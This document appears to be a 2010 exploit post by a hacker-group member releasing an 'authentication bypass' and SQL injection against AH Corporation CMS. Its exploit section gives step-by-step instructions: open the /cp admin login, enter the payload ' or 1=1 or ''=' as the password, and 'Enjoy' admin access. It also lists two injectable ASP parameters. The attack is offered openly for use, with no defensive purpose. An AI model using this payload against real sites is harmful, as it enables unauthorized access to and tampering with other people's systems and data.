AH Corporation CMS suffers from authentication bypass and remote SQL injection vulnerabilities.
4e4cadd5d7cfc7a2bfbfba96f1949c9f004fbccd25aad5b92a85ea32f52ca4cc
#########################################################################
[+] Exploit Title : AH Corporation CMS Multiple Vulnerabilities
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 13-11-2010
[~] HomePage : www.indishell.in
[~] Price : $402 Or Rs.35,000/-
[~] Version : n/a
[~] Software: http://www.ahcorporation.com/webdesigningpackages.htm
[~] Vulnerability Style : Authentication Bypass / Sql Injection (asp)
#########################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----== INDIAN CYBER ARMY ==----
We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Th3 RDX
shouts to : "Rajputgal Mahi" and all IW members :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---==[Authentication Bypass]==---
[1] Go to the URL:
http://server/cp
[2] Apply these details for login:
Username: admin
PassWord: ' or 1=1 or ''='
[3] You will Redirected to Admin page:
[4] Enjoy
---==[Sql Injection (s)]==---
http://server/more.asp?itemCode=1
http://server/products.asp?catID=18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 13 November 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#